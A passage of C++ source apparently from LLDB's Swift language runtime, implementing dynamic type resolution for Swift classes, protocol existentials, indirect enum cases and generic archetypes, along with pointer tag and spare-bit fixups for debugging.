IsScratchContextLocked(*target) : true; } bool SwiftLanguageRuntime::GetDynamicTypeAndAddress_Class( ValueObject &in_value, SwiftASTContext &scratch_ctx, lldb::DynamicValueType use_dynamic, TypeAndOrName &class_type_or_name, Address &address) { AddressType address_type; lldb::addr_t class_metadata_ptr = in_value.GetPointerValue(&address_type); if (class_metadata_ptr == LLDB_INVALID_ADDRESS || class_metadata_ptr == 0) return false; address.SetRawAddress(class_metadata_ptr); Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES)); auto &remote_ast = GetRemoteASTContext(scratch_ctx); swift::remote::RemoteAddress instance_address(class_metadata_ptr); auto metadata_address = remote_ast.getHeapMetadataForObject(instance_address); if (!metadata_address) { if (log) { log->Printf("could not read heap metadata for object at %lu: %s\n", class_metadata_ptr, metadata_address.getFailure().render().c_str()); } return false; } auto instance_type = remote_ast.getTypeForRemoteTypeMetadata(metadata_address.getValue(), /*skipArtificial=*/true); if (!instance_type) { if (log) { log->Printf("could not get type metadata from address %" PRIu64 " : %s\n", metadata_address.getValue().getAddressData(), instance_type.getFailure().render().c_str()); } return false; } // The read lock must have been acquired by the caller. 
class_type_or_name.SetCompilerType(
      {&scratch_ctx, instance_type.getValue().getPointer()});
  return true;
}

/// Check whether \p in_value (statically typed as an ErrorType existential)
/// actually holds a plausible error instance, by probing the expected
/// memory layout of the error object.
bool SwiftLanguageRuntime::IsValidErrorValue(ValueObject &in_value) {
  CompilerType var_type = in_value.GetStaticValue()->GetCompilerType();
  SwiftASTContext::ProtocolInfo protocol_info;
  if (!SwiftASTContext::GetProtocolTypeInfo(var_type, protocol_info))
    return false;
  if (!protocol_info.m_is_errortype)
    return false;

  unsigned index = SwiftASTContext::ProtocolInfo::error_instance_index;
  ValueObjectSP instance_type_sp(
      in_value.GetStaticValue()->GetChildAtIndex(index, true));
  if (!instance_type_sp)
    return false;
  lldb::addr_t metadata_location = instance_type_sp->GetValueAsUnsigned(0);
  if (metadata_location == 0 || metadata_location == LLDB_INVALID_ADDRESS)
    return false;

  SetupSwiftError();
  if (m_SwiftNativeNSErrorISA.hasValue()) {
    if (auto objc_runtime = GetObjCRuntime()) {
      if (auto descriptor =
              objc_runtime->GetClassDescriptor(*instance_type_sp)) {
        if (descriptor->GetISA() != m_SwiftNativeNSErrorISA.getValue()) {
          // not a __SwiftNativeNSError - but statically typed as ErrorType
          // return true here
          return true;
        }
      }
    }
  }

  if (GetObjCRuntime()) {
    // this is a swift native error but it can be bridged to ObjC
    // so it needs to be layout compatible

    size_t ptr_size = m_process->GetAddressByteSize();
    size_t metadata_offset =
        ptr_size + 4 + (ptr_size == 8 ? 4 : 0);        // CFRuntimeBase
    metadata_offset += ptr_size + ptr_size + ptr_size; // CFIndex + 2*CFRef

    metadata_location += metadata_offset;
    Status error;
    lldb::addr_t metadata_ptr_value =
        m_process->ReadPointerFromMemory(metadata_location, error);
    if (metadata_ptr_value == 0 || metadata_ptr_value == LLDB_INVALID_ADDRESS ||
        error.Fail())
      return false;
  } else {
    // this is a swift native error and it has no way to be bridged to ObjC
    // so it adopts a more compact layout

    Status error;

    size_t ptr_size = m_process->GetAddressByteSize();
    size_t metadata_offset = 2 * ptr_size;
    metadata_location += metadata_offset;
    lldb::addr_t metadata_ptr_value =
        m_process->ReadPointerFromMemory(metadata_location, error);
    if (metadata_ptr_value == 0 || metadata_ptr_value == LLDB_INVALID_ADDRESS ||
        error.Fail())
      return false;
  }

  return true;
}

/// Resolve the dynamic type stored inside an existential (protocol-typed)
/// value via RemoteAST.  The caller must hold the scratch-context lock.
bool SwiftLanguageRuntime::GetDynamicTypeAndAddress_Protocol(
    ValueObject &in_value, CompilerType protocol_type,
    SwiftASTContext &scratch_ctx, lldb::DynamicValueType use_dynamic,
    TypeAndOrName &class_type_or_name, Address &address) {
  Log *log(GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES));
  auto &target = m_process->GetTarget();
  assert(IsScratchContextLocked(target) &&
         "Swift scratch context not locked ahead");
  auto &remote_ast = GetRemoteASTContext(scratch_ctx);

  lldb::addr_t existential_address;
  bool use_local_buffer = false;

  if (in_value.GetValueType() == eValueTypeConstResult &&
      in_value.GetValue().GetValueType() ==
          lldb_private::Value::eValueTypeHostAddress) {
    if (log)
      log->Printf("existential value is a const result");

    // We have a locally materialized value that is a host address;
    // register it with MemoryReader so it does not treat it as a load
    // address. Note that this assumes that any address at that host
    // address is also a load address. If this assumption breaks there
    // will be a crash in readBytes().
existential_address = in_value.GetValue().GetScalar().ULongLong(); use_local_buffer = true; } else { existential_address = in_value.GetAddressOf(); } if (log) log->Printf("existential address is %llu", existential_address); if (!existential_address || existential_address == LLDB_INVALID_ADDRESS) return false; if (use_local_buffer) PushLocalBuffer(existential_address, in_value.GetByteSize()); swift::remote::RemoteAddress remote_existential(existential_address); auto result = remote_ast.getDynamicTypeAndAddressForExistential( remote_existential, GetSwiftType(protocol_type)); if (use_local_buffer) PopLocalBuffer(); if (!result.isSuccess()) { if (log) log->Printf("RemoteAST failed to get dynamic type of existential"); return false; } auto type_and_address = result.getValue(); class_type_or_name.SetCompilerType(type_and_address.InstanceType); address.SetRawAddress(type_and_address.PayloadAddress.getAddressData()); return true; } SwiftLanguageRuntime::MetadataPromiseSP SwiftLanguageRuntime::GetPromiseForTypeNameAndFrame(const char *type_name, StackFrame *frame) { if (!frame || !type_name || !type_name[0]) return nullptr; StreamString type_metadata_ptr_var_name; type_metadata_ptr_var_name.Printf("$%s", type_name); VariableList *var_list = frame->GetVariableList(false); if (!var_list) return nullptr; VariableSP var_sp(var_list->FindVariable( ConstString(type_metadata_ptr_var_name.GetData()))); if (!var_sp) return nullptr; ValueObjectSP metadata_ptr_var_sp( frame->GetValueObjectForFrameVariable(var_sp, lldb::eNoDynamicValues)); if (!metadata_ptr_var_sp || metadata_ptr_var_sp->UpdateValueIfNeeded() == false) return nullptr; lldb::addr_t metadata_location(metadata_ptr_var_sp->GetValueAsUnsigned(0)); if (metadata_location == 0 || metadata_location == LLDB_INVALID_ADDRESS) return nullptr; return GetMetadataPromise(metadata_location, *metadata_ptr_var_sp); } CompilerType SwiftLanguageRuntime::DoArchetypeBindingForType(StackFrame &stack_frame, CompilerType base_type) { auto sc = 
stack_frame.GetSymbolContext(lldb::eSymbolContextEverything);
  Status error;
  // A failing Clang import in a module context permanently damages
  // that module context. Binding archetypes can trigger an import of
  // another module, so switch to a scratch context where such an
  // operation is safe.
  auto &target = m_process->GetTarget();
  assert(IsScratchContextLocked(target) &&
         "Swift scratch context not locked ahead of archetype binding");
  auto scratch_ctx = target.GetScratchSwiftASTContext(error, stack_frame);
  if (!scratch_ctx)
    return base_type;
  base_type = scratch_ctx->ImportType(base_type, error);

  if (base_type.GetTypeInfo() & lldb::eTypeIsSwift) {
    swift::Type target_swift_type(GetSwiftType(base_type));
    if (target_swift_type->hasArchetype())
      target_swift_type = target_swift_type->mapTypeOutOfContext().getPointer();

    // FIXME: This is wrong, but it doesn't actually matter right now since
    // all conformances are always visible
    auto *module_decl = scratch_ctx->GetASTContext()->getStdlibModule();

    // Replace opaque types with their underlying types when possible.
    swift::Mangle::ASTMangler mangler(true);

    // Iterate until no opaque archetypes remain (or a fixpoint is reached,
    // see the bottom of the loop).
    while (target_swift_type->hasOpaqueArchetype()) {
      auto old_type = target_swift_type;
      target_swift_type = target_swift_type.subst(
          [&](swift::SubstitutableType *type) -> swift::Type {
            auto opaque_type =
                llvm::dyn_cast<swift::OpaqueTypeArchetypeType>(type);
            if (!opaque_type)
              return type;

            // Try to find the symbol for the opaque type descriptor in the
            // process.
            auto mangled_name = ConstString(
                mangler.mangleOpaqueTypeDescriptor(opaque_type->getDecl()));

            SymbolContextList found;
            target.GetImages().FindSymbolsWithNameAndType(
                mangled_name, eSymbolTypeData, found);

            if (found.GetSize() == 0)
              return type;

            swift::Type result_type;

            for (unsigned i = 0, e = found.GetSize(); i < e; ++i) {
              SymbolContext found_sc;
              if (!found.GetContextAtIndex(i, found_sc))
                continue;

              // See if the symbol has an address.
              if (!found_sc.symbol)
                continue;
              auto addr = found_sc.symbol->GetAddress().GetLoadAddress(&target);
              if (!addr || addr == LLDB_INVALID_ADDRESS)
                continue;

              // Ask RemoteAST to get the underlying type out of the
              // descriptor.
              auto &remote_ast = GetRemoteASTContext(*scratch_ctx);
              auto underlying_type_result =
                  remote_ast.getUnderlyingTypeForOpaqueType(
                      swift::remote::RemoteAddress(addr),
                      opaque_type->getSubstitutions(),
                      opaque_type->getOrdinal());

              if (!underlying_type_result)
                continue;

              // If we haven't yet gotten an underlying type, use this as our
              // possible result.
              if (!result_type) {
                result_type = underlying_type_result.getValue();
              }
              // If we have two possibilities, they should match.
              else if (!result_type->isEqual(
                           underlying_type_result.getValue())) {
                return type;
              }
            }

            if (!result_type)
              return type;

            return result_type;
          },
          swift::LookUpConformanceInModule(module_decl),
          swift::SubstFlags::DesugarMemberTypes |
              swift::SubstFlags::SubstituteOpaqueArchetypes);

      // Stop if we've reached a fixpoint where we can't further resolve opaque
      // types.
      if (old_type->isEqual(target_swift_type))
        break;
    }

    // Second pass: replace generic type parameters with the concrete types
    // recorded for this frame (via the "$<name>" metadata variables).
    target_swift_type = target_swift_type.subst(
        [this, &stack_frame,
         &scratch_ctx](swift::SubstitutableType *type) -> swift::Type {
          StreamString type_name;
          if (!GetAbstractTypeName(type_name, type))
            return type;
          CompilerType concrete_type = this->GetConcreteType(
              &stack_frame, ConstString(type_name.GetString()));
          Status import_error;
          CompilerType target_concrete_type =
              scratch_ctx->ImportType(concrete_type, import_error);

          if (target_concrete_type.IsValid())
            return swift::Type(GetSwiftType(target_concrete_type));

          return type;
        },
        swift::LookUpConformanceInModule(module_decl),
        swift::SubstFlags::DesugarMemberTypes);
    assert(target_swift_type);

    return {target_swift_type.getPointer()};
  }
  return base_type;
}

/// Render a generic type parameter as its canonical abstract name
/// ("τ_<depth>_<index>").  Returns false for non-generic-parameter types.
bool SwiftLanguageRuntime::GetAbstractTypeName(StreamString &name,
                                               swift::Type swift_type) {
  auto *generic_type_param = swift_type->getAs<swift::GenericTypeParamType>();
  if (!generic_type_param)
    return false;

  name.Printf(u8"\u03C4_%d_%d", generic_type_param->getDepth(),
              generic_type_param->getIndex());
  return true;
}

/// "Dynamic type" resolution for value types: the bound type is already the
/// dynamic type; just validate the size/address and report the location.
bool SwiftLanguageRuntime::GetDynamicTypeAndAddress_Value(
    ValueObject &in_value, CompilerType &bound_type,
    lldb::DynamicValueType use_dynamic, TypeAndOrName &class_type_or_name,
    Address &address) {
  class_type_or_name.SetCompilerType(bound_type);
  llvm::Optional<uint64_t> size = bound_type.GetByteSize(
      in_value.GetExecutionContextRef().GetFrameSP().get());
  if (!size)
    return false;
  lldb::addr_t val_address = in_value.GetAddressOf(true, nullptr);
  if (*size && (!val_address || val_address == LLDB_INVALID_ADDRESS))
    return false;

  address.SetLoadAddress(val_address, in_value.GetTargetSP().get());
  return true;
}

/// Resolve the payload of an indirect enum case: follow the box pointer,
/// then recurse into GetDynamicTypeAndAddress for the payload type.
bool SwiftLanguageRuntime::GetDynamicTypeAndAddress_IndirectEnumCase(
    ValueObject &in_value, lldb::DynamicValueType use_dynamic,
    TypeAndOrName &class_type_or_name, Address &address) {
  static ConstString g_offset("offset");

  DataExtractor data;
  Status error;
  if (!(in_value.GetParent() &&
in_value.GetParent()->GetData(data, error) && error.Success()))
    return false;

  bool has_payload;
  bool is_indirect;
  CompilerType payload_type;
  if (!SwiftASTContext::GetSelectedEnumCase(
          in_value.GetParent()->GetCompilerType(), data, nullptr, &has_payload,
          &payload_type, &is_indirect))
    return false;

  if (has_payload && is_indirect && payload_type)
    class_type_or_name.SetCompilerType(payload_type);

  // The value itself is the (possibly tagged) pointer to the heap box.
  lldb::addr_t box_addr = in_value.GetValueAsUnsigned(LLDB_INVALID_ADDRESS);
  if (box_addr == LLDB_INVALID_ADDRESS)
    return false;

  box_addr = MaskMaybeBridgedPointer(box_addr);
  lldb::addr_t box_location = m_process->ReadPointerFromMemory(box_addr, error);
  if (box_location == LLDB_INVALID_ADDRESS)
    return false;

  box_location = MaskMaybeBridgedPointer(box_location);
  // Read the payload offset out of the box metadata.
  ProcessStructReader reader(m_process, box_location, GetBoxMetadataType());
  uint32_t offset = reader.GetField<uint32_t>(g_offset);
  lldb::addr_t box_value = box_addr + offset;

  // try to read one byte at the box value
  m_process->ReadUnsignedIntegerFromMemory(box_value, 1, 0, error);
  if (error.Fail()) // and if that fails, then we're off in no man's land
    return false;

  Flags type_info(payload_type.GetTypeInfo());
  if (type_info.AllSet(eTypeIsSwift | eTypeIsClass)) {
    lldb::addr_t old_box_value = box_value;
    box_value = m_process->ReadPointerFromMemory(box_value, error);
    if (box_value == LLDB_INVALID_ADDRESS)
      return false;

    // NOTE: shadows the outer `data` deliberately — this one wraps the
    // pointer we just read.
    DataExtractor data(&box_value, m_process->GetAddressByteSize(),
                       m_process->GetByteOrder(),
                       m_process->GetAddressByteSize());
    ValueObjectSP valobj_sp(ValueObject::CreateValueObjectFromData(
        "_", data, *m_process, payload_type));
    if (!valobj_sp)
      return false;

    Value::ValueType value_type;
    if (!GetDynamicTypeAndAddress(*valobj_sp, use_dynamic, class_type_or_name,
                                  address, value_type))
      return false;

    address.SetRawAddress(old_box_value);
    return true;
  } else if (type_info.AllSet(eTypeIsSwift | eTypeIsProtocol)) {
    SwiftASTContext::ProtocolInfo protocol_info;
    if (!SwiftASTContext::GetProtocolTypeInfo(payload_type, protocol_info))
      return false;
    // Copy the existential's storage words out of the box word by word.
    auto ptr_size = m_process->GetAddressByteSize();
    std::vector<uint8_t> buffer(ptr_size * protocol_info.m_num_storage_words,
                                0);
    for (uint32_t idx = 0; idx < protocol_info.m_num_storage_words; idx++) {
      lldb::addr_t word = m_process->ReadUnsignedIntegerFromMemory(
          box_value + idx * ptr_size, ptr_size, 0, error);
      if (error.Fail())
        return false;
      memcpy(&buffer[idx * ptr_size], &word, ptr_size);
    }
    DataExtractor data(&buffer[0], buffer.size(), m_process->GetByteOrder(),
                       m_process->GetAddressByteSize());
    ValueObjectSP valobj_sp(ValueObject::CreateValueObjectFromData(
        "_", data, *m_process, payload_type));
    if (!valobj_sp)
      return false;

    Value::ValueType value_type;
    if (!GetDynamicTypeAndAddress(*valobj_sp, use_dynamic, class_type_or_name,
                                  address, value_type))
      return false;

    address.SetRawAddress(box_value);
    return true;
  } else {
    // This is most likely a statically known type.
    address.SetLoadAddress(box_value, &m_process->GetTarget());
    return true;
  }
}

// Dynamic type resolution tends to want to generate scalar data - but there
// are caveats
// Per original comment here
// "Our address is the location of the dynamic type stored in memory. It isn't
// a load address,
// because we aren't pointing to the LOCATION that stores the pointer to us,
// we're pointing to us..."
// See inlined comments for exceptions to this general rule.
Value::ValueType SwiftLanguageRuntime::GetValueType(
    Value::ValueType static_value_type, const CompilerType &static_type,
    const CompilerType &dynamic_type, bool is_indirect_enum_case) {
  Flags static_type_flags(static_type.GetTypeInfo());
  Flags dynamic_type_flags(dynamic_type.GetTypeInfo());

  if (dynamic_type_flags.AllSet(eTypeIsSwift)) {
    // for a protocol object where does the dynamic data live if the target
    // object is a struct? (for a class, it's easy)
    if (static_type_flags.AllSet(eTypeIsSwift | eTypeIsProtocol) &&
        dynamic_type_flags.AnySet(eTypeIsStructUnion | eTypeIsEnumeration)) {
      SwiftASTContext *swift_ast_ctx =
          llvm::dyn_cast_or_null<SwiftASTContext>(static_type.GetTypeSystem());

      if (swift_ast_ctx && swift_ast_ctx->IsErrorType(static_type)) {
        // ErrorType values are always a pointer
        return Value::eValueTypeLoadAddress;
      }

      switch (SwiftASTContext::GetAllocationStrategy(dynamic_type)) {
      case SwiftASTContext::TypeAllocationStrategy::eDynamic:
      case SwiftASTContext::TypeAllocationStrategy::eUnknown:
        break;
      case SwiftASTContext::TypeAllocationStrategy::eInline: // inline data;
                                                             // same as the
                                                             // static data
        return static_value_type;
      case SwiftASTContext::TypeAllocationStrategy::ePointer: // pointed-to; in
                                                              // the target
        return Value::eValueTypeLoadAddress;
      }
    }
    if (static_type_flags.AllSet(eTypeIsSwift | eTypeIsGenericTypeParam)) {
      // if I am handling a non-pointer Swift type obtained from an archetype,
      // then the runtime vends the location
      // of the object, not the object per se (since the object is not a
      // pointer itself, this is way easier to achieve)
      // hence, it's a load address, not a scalar containing a pointer as for
      // ObjC classes
      if (dynamic_type_flags.AllClear(eTypeIsPointer | eTypeIsReference |
                                      eTypeInstanceIsPointer))
        return Value::eValueTypeLoadAddress;
    }

    if (static_type_flags.AllSet(eTypeIsSwift | eTypeIsPointer) &&
        static_type_flags.AllClear(eTypeIsGenericTypeParam)) {
      // FIXME: This branch is not covered by any testcases in the test suite.
      if (is_indirect_enum_case || static_type_flags.AllClear(eTypeIsBuiltIn))
        return Value::eValueTypeLoadAddress;
    }
  }

  // Enabling this makes the inout_variables test hang.
  //  return Value::eValueTypeScalar;
  if (static_type_flags.AllSet(eTypeIsSwift) &&
      dynamic_type_flags.AllSet(eTypeIsSwift) &&
      dynamic_type_flags.AllClear(eTypeIsPointer | eTypeInstanceIsPointer))
    return static_value_type;
  else
    return Value::eValueTypeScalar;
}

/// True when \p valobj is the payload of an indirect enum case (tracked via
/// language flags set during child creation).
static bool IsIndirectEnumCase(ValueObject &valobj) {
  return (valobj.GetLanguageFlags() &
          SwiftASTContext::LanguageFlags::eIsIndirectEnumCase) ==
         SwiftASTContext::LanguageFlags::eIsIndirectEnumCase;
}

/// Top-level dynamic type resolution entry point: dispatches to the class /
/// protocol / indirect-enum / value strategies, retrying once with
/// per-module scratch contexts when the shared one has fatal errors.
bool SwiftLanguageRuntime::GetDynamicTypeAndAddress(
    ValueObject &in_value, lldb::DynamicValueType use_dynamic,
    TypeAndOrName &class_type_or_name, Address &address,
    Value::ValueType &value_type) {
  class_type_or_name.Clear();
  if (use_dynamic == lldb::eNoDynamicValues || !CouldHaveDynamicValue(in_value))
    return false;

  // Dynamic type resolution in RemoteAST might pull in other Swift modules, so
  // use the scratch context where such operations are legal and safe.
  assert(IsScratchContextLocked(in_value.GetTargetSP()) &&
         "Swift scratch context not locked ahead of dynamic type resolution");
  auto scratch_ctx = in_value.GetScratchSwiftASTContext();
  if (!scratch_ctx)
    return false;

  auto retry_once = [&]() {
    // Retry exactly once using the per-module fallback scratch context.
    auto &target = m_process->GetTarget();
    if (!target.UseScratchTypesystemPerModule()) {
      Log *log(lldb_private::GetLogIfAllCategoriesSet(LIBLLDB_LOG_TYPES));
      if (log)
        log->Printf("Dynamic type resolution detected fatal errors in "
                    "shared Swift state. Falling back to per-module "
                    "scratch context.\n");
      target.SetUseScratchTypesystemPerModule(true);
      return GetDynamicTypeAndAddress(in_value, use_dynamic, class_type_or_name,
                                      address, value_type);
    }
    return false;
  };

  if (scratch_ctx->HasFatalErrors())
    return retry_once();

  // Import the type into the scratch context. Any form of dynamic
  // type resolution may trigger a cross-module import.
CompilerType val_type(in_value.GetCompilerType());
  Flags type_info(val_type.GetTypeInfo());
  if (!type_info.AnySet(eTypeIsSwift))
    return false;

  bool success = false;
  bool is_indirect_enum_case = IsIndirectEnumCase(in_value);
  // Type kinds with metadata don't need archetype binding.
  if (is_indirect_enum_case)
    // ..._IndirectEnumCase() recurses, no need to bind archetypes.
    success = GetDynamicTypeAndAddress_IndirectEnumCase(
        in_value, use_dynamic, class_type_or_name, address);
  else if (type_info.AnySet(eTypeIsClass) ||
           type_info.AllSet(eTypeIsBuiltIn | eTypeIsPointer | eTypeHasValue))
    success = GetDynamicTypeAndAddress_Class(
        in_value, *scratch_ctx, use_dynamic, class_type_or_name, address);
  else if (type_info.AnySet(eTypeIsProtocol))
    success = GetDynamicTypeAndAddress_Protocol(in_value, val_type,
                                                *scratch_ctx, use_dynamic,
                                                class_type_or_name, address);
  else {
    // Perform archetype binding in the scratch context.
    auto *frame = in_value.GetExecutionContextRef().GetFrameSP().get();
    if (!frame)
      return false;

    CompilerType bound_type = DoArchetypeBindingForType(*frame, val_type);
    if (!bound_type)
      return false;

    Flags subst_type_info(bound_type.GetTypeInfo());
    if (subst_type_info.AnySet(eTypeIsClass)) {
      success = GetDynamicTypeAndAddress_Class(in_value, *scratch_ctx,
                                               use_dynamic, class_type_or_name,
                                               address);
    } else if (subst_type_info.AnySet(eTypeIsProtocol)) {
      success = GetDynamicTypeAndAddress_Protocol(in_value, bound_type,
                                                  *scratch_ctx, use_dynamic,
                                                  class_type_or_name, address);
    } else {
      success = GetDynamicTypeAndAddress_Value(in_value, bound_type,
                                               use_dynamic, class_type_or_name,
                                               address);
    }
  }

  if (success)
    value_type = GetValueType(
        in_value.GetValue().GetValueType(), in_value.GetCompilerType(),
        class_type_or_name.GetCompilerType(), is_indirect_enum_case);
  else if (scratch_ctx->HasFatalErrors())
    return retry_once();
  return success;
}

/// Adjust the resolved dynamic type so its pointer-ness/reference-ness
/// matches the static type's (e.g. make an ObjC dynamic type a pointer when
/// the static Swift type was a class instance).
TypeAndOrName
SwiftLanguageRuntime::FixUpDynamicType(const TypeAndOrName &type_and_or_name,
                                       ValueObject &static_value) {
  TypeAndOrName ret(type_and_or_name);
  bool should_be_made_into_ref = false;
  bool should_be_made_into_ptr = false;
  Flags type_flags(static_value.GetCompilerType().GetTypeInfo());
  Flags type_andor_name_flags(type_and_or_name.GetCompilerType().GetTypeInfo());

  // if the static type is a pointer or reference, so should the dynamic type
  // caveat: if the static type is a Swift class instance, the dynamic type
  // could either be a Swift type (no need to change anything), or an ObjC type
  // in which case it needs to be made into a pointer
  if (type_flags.AnySet(eTypeIsPointer))
    should_be_made_into_ptr =
        (type_flags.AllClear(eTypeIsGenericTypeParam | eTypeIsBuiltIn) &&
         !IsIndirectEnumCase(static_value));
  else if (type_flags.AnySet(eTypeInstanceIsPointer))
    should_be_made_into_ptr = !type_andor_name_flags.AllSet(eTypeIsSwift);
  else if (type_flags.AnySet(eTypeIsReference))
    should_be_made_into_ref = true;
  else if (type_flags.AllSet(eTypeIsSwift | eTypeIsProtocol))
    should_be_made_into_ptr =
        type_and_or_name.GetCompilerType().IsRuntimeGeneratedType() &&
        !type_and_or_name.GetCompilerType().IsPointerType();

  if (type_and_or_name.HasType()) {
    // The type will always be the type of the dynamic object. If our parent's
    // type was a pointer,
    // then our type should be a pointer to the type of the dynamic object. If
    // a reference, then the original type
    // should be okay...
    CompilerType orig_type = type_and_or_name.GetCompilerType();
    CompilerType corrected_type = orig_type;
    if (should_be_made_into_ptr)
      corrected_type = orig_type.GetPointerType();
    else if (should_be_made_into_ref)
      corrected_type = orig_type.GetLValueReferenceType();
    ret.SetCompilerType(corrected_type);
  }
  return ret;
}

/// Check whether \p addr is a tagged unowned reference to an Objective-C
/// object (Darwin-only encoding: low bit set on an UnownedStorage value).
bool SwiftLanguageRuntime::IsTaggedPointer(lldb::addr_t addr,
                                           CompilerType type) {
  swift::CanType swift_can_type = GetCanonicalSwiftType(type);
  switch (swift_can_type->getKind()) {
  case swift::TypeKind::UnownedStorage: {
    Target &target = m_process->GetTarget();
    llvm::Triple triple = target.GetArchitecture().GetTriple();
    // On Darwin the Swift runtime stores unowned references to
    // Objective-C objects as a pointer to a struct that has the
    // actual object pointer at offset zero. The least significant bit
    // of the reference pointer indicates whether the reference refers
    // to an Objective-C or Swift object.
    //
    // This is a property of the Swift runtime(!). In the future it
    // may be necessary to check for the version of the Swift runtime
    // (or indirectly by looking at the version of the remote
    // operating system) to determine how to interpret references.
    if (triple.isOSDarwin())
      // Check whether this is a reference to an Objective-C object.
      if ((addr & 1) == 1)
        return true;
  }
  default:
    break;
  }
  return false;
}

/// Strip tag/spare bits from a pointer read from the target.
/// \return the cleaned pointer and whether an extra dereference is needed
///         (true only for tagged unowned ObjC references).
std::pair<lldb::addr_t, bool>
SwiftLanguageRuntime::FixupPointerValue(lldb::addr_t addr, CompilerType type) {
  // Check for an unowned Darwin Objective-C reference.
  if (IsTaggedPointer(addr, type)) {
    // Clear the discriminator bit to get at the pointer to Objective-C object.
    bool needs_deref = true;
    return {addr & ~1ULL, needs_deref};
  }

  // Adjust the pointer to strip away the spare bits.
Target &target = m_process->GetTarget();
  llvm::Triple triple = target.GetArchitecture().GetTriple();
  // Per-architecture Swift ABI spare-bit masks.
  switch (triple.getArch()) {
  case llvm::Triple::ArchType::aarch64:
    return {addr & ~SWIFT_ABI_ARM64_SWIFT_SPARE_BITS_MASK, false};
  case llvm::Triple::ArchType::arm:
    return {addr & ~SWIFT_ABI_ARM_SWIFT_SPARE_BITS_MASK, false};
  case llvm::Triple::ArchType::x86:
    return {addr & ~SWIFT_ABI_I386_SWIFT_SPARE_BITS_MASK, false};
  case llvm::Triple::ArchType::x86_64:
    return {addr & ~SWIFT_ABI_X86_64_SWIFT_SPARE_BITS_MASK, false};
  case llvm::Triple::ArchType::systemz:
    return {addr & ~SWIFT_ABI_S390X_SWIFT_SPARE_BITS_MASK, false};
  case llvm::Triple::ArchType::ppc64le:
    return {addr & ~SWIFT_ABI_POWERPC64_SWIFT_SPARE_BITS_MASK, false};
  default:
    break;
  }
  return {addr, false};
}

/// This allows a language runtime to adjust references depending on the type.
lldb::addr_t SwiftLanguageRuntime::FixupAddress(lldb::addr_t addr,
                                                CompilerType type,
                                                Status &error) {
  swift::CanType swift_can_type = GetCanonicalSwiftType(type);
  switch (swift_can_type->getKind()) {
  case swift::TypeKind::UnownedStorage: {
    // Peek into the reference to see whether it needs an extra deref.
    // If yes, return the fixed-up address we just read.
    Target &target = m_process->GetTarget();
    size_t ptr_size = m_process->GetAddressByteSize();
    lldb::addr_t refd_addr = LLDB_INVALID_ADDRESS;
    target.ReadMemory(addr, false, &refd_addr, ptr_size, error);
    if (error.Success()) {
      bool extra_deref;
      std::tie(refd_addr, extra_deref) = FixupPointerValue(refd_addr, type);
      if (extra_deref)
        return refd_addr;
    }
  }
  default:
    break;
  }
  return addr;
}

/// Look up the remote-mirror TypeInfo for \p type by demangling its mangled
/// name through the reflection context's type builder.
const swift::reflection::TypeInfo *
SwiftLanguageRuntime::GetTypeInfo(CompilerType type) {
  swift::CanType swift_can_type(GetCanonicalSwiftType(type));
  CompilerType can_type(swift_can_type);
  ConstString mangled_name(can_type.GetMangledTypeName());
  StringRef mangled_no_prefix =
      swift::Demangle::dropSwiftManglingPrefix(mangled_name.GetStringRef());
  swift::Demangle::Demangler Dem;
  auto demangled = Dem.demangleType(mangled_no_prefix);
  auto *type_ref = swift::Demangle::decodeMangledType(
      reflection_ctx->getBuilder(), demangled);
  if (!type_ref)
    return nullptr;
  return reflection_ctx->getBuilder().getTypeConverter().getTypeInfo(type_ref);
}

/// A value fits the inline existential buffer when it is bitwise takable and
/// no larger than 24 bytes (3 words); default to true when unknown.
bool SwiftLanguageRuntime::IsStoredInlineInBuffer(CompilerType type) {
  if (auto *type_info = GetTypeInfo(type))
    return type_info->isBitwiseTakable() && type_info->getSize() <= 24;
  return true;
}

/// Size of \p type in bits, per remote mirrors; empty when unknown.
llvm::Optional<uint64_t> SwiftLanguageRuntime::GetBitSize(CompilerType type) {
  if (auto *type_info = GetTypeInfo(type))
    return type_info->getSize() * 8;
  return {};
}

/// Stride of \p type in bytes, per remote mirrors; empty when unknown.
llvm::Optional<uint64_t>
SwiftLanguageRuntime::GetByteStride(CompilerType type) {
  if (auto *type_info = GetTypeInfo(type))
    return type_info->getStride();
  return {};
}

/// Alignment of \p type, per remote mirrors; empty when unknown.
/// NOTE(review): remote mirrors report alignment in bytes — confirm the
/// "Bit" in this name against callers.
llvm::Optional<size_t>
SwiftLanguageRuntime::GetBitAlignment(CompilerType type) {
  if (auto *type_info = GetTypeInfo(type))
    return type_info->getAlignment();
  return {};
}

/// The only runtime-generated value name surfaced to users is "self".
bool SwiftLanguageRuntime::IsWhitelistedRuntimeValue(ConstString name) {
  return name == g_self;
}

/// Cheap pre-filter for GetDynamicTypeAndAddress: can this value's dynamic
/// type possibly differ from its static type?
bool SwiftLanguageRuntime::CouldHaveDynamicValue(ValueObject &in_value) {
  //  if (in_value.IsDynamic())
  //    return false;
  if (IsIndirectEnumCase(in_value))
    return true;
  CompilerType var_type(in_value.GetCompilerType());
  Flags var_type_flags(var_type.GetTypeInfo());
  if (var_type_flags.AllSet(eTypeIsSwift | eTypeInstanceIsPointer)) {
    // Swift class instances are actually pointers, but base class instances
    // are inlined at offset 0 in the class data. If we just let base classes
    // be dynamic, it would cause an infinite recursion. So we would usually
    // disable it
    // But if the base class is a generic type we still need to bind it, and
    // that is
    // a good job for dynamic types to perform
    if (in_value.IsBaseClass()) {
      CompilerType base_type(in_value.GetCompilerType());
      if (SwiftASTContext::IsFullyRealized(base_type))
        return false;
    }
    return true;
  }
  return var_type.IsPossibleDynamicType(nullptr, false, false, true);
}

/// Resolve the concrete type bound to the abstract (generic-parameter) name
/// \p abstract_type_name in the frame of \p exe_scope, via its "$<name>"
/// metadata variable.
CompilerType
SwiftLanguageRuntime::GetConcreteType(ExecutionContextScope *exe_scope,
                                      ConstString abstract_type_name) {
  if (!exe_scope)
    return CompilerType();

  StackFrame *frame(exe_scope->CalculateStackFrame().get());
  if (!frame)
    return CompilerType();

  MetadataPromiseSP promise_sp(
      GetPromiseForTypeNameAndFrame(abstract_type_name.GetCString(), frame));
  if (!promise_sp)
    return CompilerType();

  return promise_sp->FulfillTypePromise();
}

namespace {

// Classification of Swift thunk symbols and what the stepping logic should
// do when it lands in one.
enum class ThunkKind {
  Unknown = 0,
  AllocatingInit,
  PartialApply,
  ObjCAttribute,
  Reabstraction,
  ProtocolConformance,
};

enum class ThunkAction {
  Unknown = 0,
  GetThunkTarget,
  StepIntoConformance,
  StepThrough
};

}

/// Classify a (demangled) thunk symbol name into a ThunkKind.
